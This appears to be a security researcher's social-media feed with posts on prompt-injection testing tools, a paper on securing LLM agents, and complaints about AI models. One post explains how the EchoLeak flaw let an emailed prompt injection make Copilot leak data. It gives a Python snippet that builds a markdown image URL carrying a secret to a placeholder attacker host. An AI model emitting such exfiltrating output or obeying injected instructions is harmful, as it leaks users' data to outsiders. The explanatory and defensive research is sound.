Donato Capitella
@dcapitella
I'm a Software Engineer and Ethical Hacker, but mostly a tech enthusiast who likes to discover how things work by breaking them apart.
Introducing spikee, an open-source toolkit for testing LLM applications against prompt injection attacks that can lead to exploitation, such as data exfiltration, XSS, and resource exhaustion. Easily create custom datasets to match your specific use cases. spikee.ai

I think there should be a law banning people from ever working in IT if, in 2025, they implement input fields that do not support copy/paste. This should be punished with jail time.
I hate GPT-4o's batshit personality, when it starts a canvas but then terminates it prematurely with "..." and then starts crying because it can't find the text to edit. AGI is just around the corner :)
Having spent a month using Sonnet 4 and Gemini 2.5, I guarantee vibe coding is not for people without a solid grounding in logic. Unless you're doing something heavily represented in the training set, the outputs require lots of in-context learning and correction to be useful.
You can check out the github repo with sample implementations here: github.com/ReversecLabs/d…
youtu.be/2Er7bmyhPfM Just released a deep dive into one of my favourite LLM security papers: “Design Patterns for Securing LLM Agents against Prompt Injections”, walking through each pattern, real-world tradeoffs, and live code implementations.
One of the most annoying things with @AnthropicAI is that if you run out of quota in a chat with Opus, you cannot just switch to Sonnet in the same chat - this is infuriating.
Gemini-2.5-pro... such a smart model. The language it uses when reasoning is hilarious. The core insight I had to provide was that we were editing a PYTHON script and it had suddenly started producing JAVA code. Real head-scratcher.

Of all the LLMs, Gemini 2.5 Pro is the most useless, and in spite of its long context, it's the least capable of making use of that context while coding. It mostly produces garbage, forgets methods, and botches stuff up. Literally useless past the 50k-token context mark.
An in-depth look at the recently published EchoLeak vulnerability on M365 Copilot by @Aim_Security_ that could lead to data exfiltration just by sending an email to a user who uses Microsoft Office365 Copilot. youtu.be/Myf1cLsUxsk
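For context, a generic illustration (my own minimal sketch, not the actual EchoLeak payload): this class of indirect prompt injection often exfiltrates data by tricking the assistant into emitting a markdown image whose URL carries the stolen content in its query string, because the client auto-fetches images and thereby sends the data to the attacker's server. The host name below is a placeholder.

```python
from urllib.parse import quote

def exfil_markdown(attacker_host: str, secret: str) -> str:
    """Build a markdown image tag that smuggles `secret` out in the URL.

    Any client that auto-renders/fetches images will request this URL,
    delivering the secret to the attacker-controlled host.
    """
    return f"![logo](https://{attacker_host}/pixel.png?d={quote(secret)})"

# Hypothetical example: injected instructions tell the model to "summarise
# the user's data and include this image", leaking the summary.
payload = exfil_markdown("attacker.example", "confidential meeting summary")
print(payload)
```

Mitigations discussed for this class of bug include stripping or proxying external image URLs before rendering, which is exactly the kind of output-side control the video covers.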

"Design Patterns for Securing LLM Agents against Prompt Injections" is an excellent new paper that provides six design patterns to help protect LLM tool-using systems (call them "agents" if you like) against prompt injection attacks
The reason this disturbs me is that it shows a complete lack of attention to detail. I can't trust o3 to read legislation carefully if it reads what it wants to read, not what is actually there.
This TBF 👇
Are you afraid to hit Enter in any chat interface now? OpenAI's disrespectful approach to UX resulted in Enter sending the message in most chat interfaces. Previously, Shift-Enter did that. Now, I'm never sure what to do to avoid sending an unfinished message when I just want…
Just as a FYI, we still haven't mapped the biological brains of anything more complex than worms. It's OK to talk about digital brains, but comparing it to a biological one is premature and just polarizing. Ilya is talking about a future maybe a century from now, where AI is…